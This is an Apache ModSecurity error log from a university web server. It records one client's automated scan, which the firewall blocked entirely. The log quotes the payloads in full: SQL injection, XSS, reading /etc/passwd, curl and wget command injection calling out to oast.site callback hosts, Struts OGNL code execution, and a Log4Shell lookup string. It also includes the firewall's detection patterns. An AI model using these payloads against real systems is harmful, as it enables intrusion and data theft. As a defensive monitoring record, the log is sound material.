[Tue Aug 29 11:33:42.301406 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/debug.cgi"] [unique_id "ZO11JsCo-f0AAANsAkAAAAAD"]
[Tue Aug 29 11:33:43.340592 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/test-cgi"] [unique_id "ZO11J8Co-f0AAARQ4BkAAAAB"]
[Tue Aug 29 11:33:45.430785 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:topicId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:topicId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/widgets/knowledgebase"] [unique_id "ZO11KcCo-f0AAARy-zgAAAAb"]
[Tue Aug 29 11:33:46.307449 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:calendarId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (5440=5440 found within ARGS:calendarId: 1) AND (SELECT 2065 FROM (SELECT(SLEEP(6)))jtGw) AND (5440=5440"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11KsCo-f0AAARdiLoAAAAK"]
[Tue Aug 29 11:33:47.390667 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgmzesxmtn9po8n.oast.site -H 'User-Agent: CRvF1U' #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11K8Co-f0AAARxOrkAAAAa"]
[Tue Aug 29 11:33:48.308687 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "digilibfkip.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LMCo-f0AAARjjRwAAAAL"]
[Tue Aug 29 11:33:48.359192 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlg14e3xo1hugjzh.oast.site -H 'User-Agent: CRvF1U'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11LMCo-f0AAAR@KIEAAAAF"]
[Tue Aug 29 11:33:49.304990 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:uid: 10; curl http:/cjmn8l5jmimk2adbbnlgs5pgwuduhpp88.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/system/sharedir.php"] [unique_id "ZO11LcCo-f0AAASFedkAAAAG"]
[Tue Aug 29 11:33:49.335487 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "digilibfkip.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11LcCo-f0AAASEJQMAAAAE"]
[Tue Aug 29 11:33:50.340153 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccess [hostname "digilibfkip.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LsCo-f0AAAR@KIoAAAAF"]
[Tue Aug 29 11:33:50.368108 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:task_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:task_number: 1;curl http:/cjmn8l5jmimk2adbbnlga5shypksb1fcm.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/en/php/usb_sync.php"] [unique_id "ZO11LsCo-f0AAARQ4C0AAAAB"]
[Tue Aug 29 11:33:51.335619 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "digilibfkip.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11L8Co-f0AAARxOsUAAAAa"]
[Tue Aug 29 11:33:52.370555 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:customer_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:customer_number: -1' UNION ALL SELECT NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/mims/updatecustomer.php"] [unique_id "ZO11MMCo-f0AAARjjS8AAAAL"]
[Tue Aug 29 11:33:52.451247 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "digilibfkip.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11MMCo-f0AAASEJREAAAAE"]
[Tue Aug 29 11:33:53.298806 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sondata[ip]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:sondata[ip]: a|curl cjmn8l5jmimk2adbbnlgcxwqgija4ebwm.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/php/ping.php"] [unique_id "ZO11McCo-f0AAARjjTIAAAAL"]
[Tue Aug 29 11:33:53.327232 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:login: ${jndi:ldap://${:-594}${:-752}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgc6o494rewqxyp.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/zdm/cxf/login"] [unique_id "ZO11McCo-f0AAASAHecAAAAH"]
[Tue Aug 29 11:33:53.344091 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccessib [hostname "digilibfkip.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11McCo-f0AAARy-1MAAAAb"]
[Tue Aug 29 11:33:54.380065 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:account. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:account: admin' and  updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/zentao/user-login.html"] [unique_id "ZO11MsCo-f0AAARjjTsAAAAL"]
[Tue Aug 29 11:33:54.398811 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "digilibfkip.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11MsCo-f0AAARdiN4AAAAK"]
[Tue Aug 29 11:33:55.344338 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "digilibfkip.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11M8Co-f0AAARQ4E0AAAAB"]
[Tue Aug 29 11:33:55.541599 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:item_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:item_id: 0 union select sleep(5) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11M8Co-f0AAAR@KKgAAAAF"]
[Tue Aug 29 11:33:57.339022 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:plot. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:plot: ;wget http:/cjmn8l5jmimk2adbbnlgpczk4mwq7crf6.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NcCo-f0AAARy-2wAAAAb"]
[Tue Aug 29 11:33:57.676950 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.set [hostname "digilibfkip.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11NcCo-f0AAASGMrkAAAAA"]
[Tue Aug 29 11:33:58.245588 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id_products[]: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(6)))xoOt)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAARy-38AAAAb"]
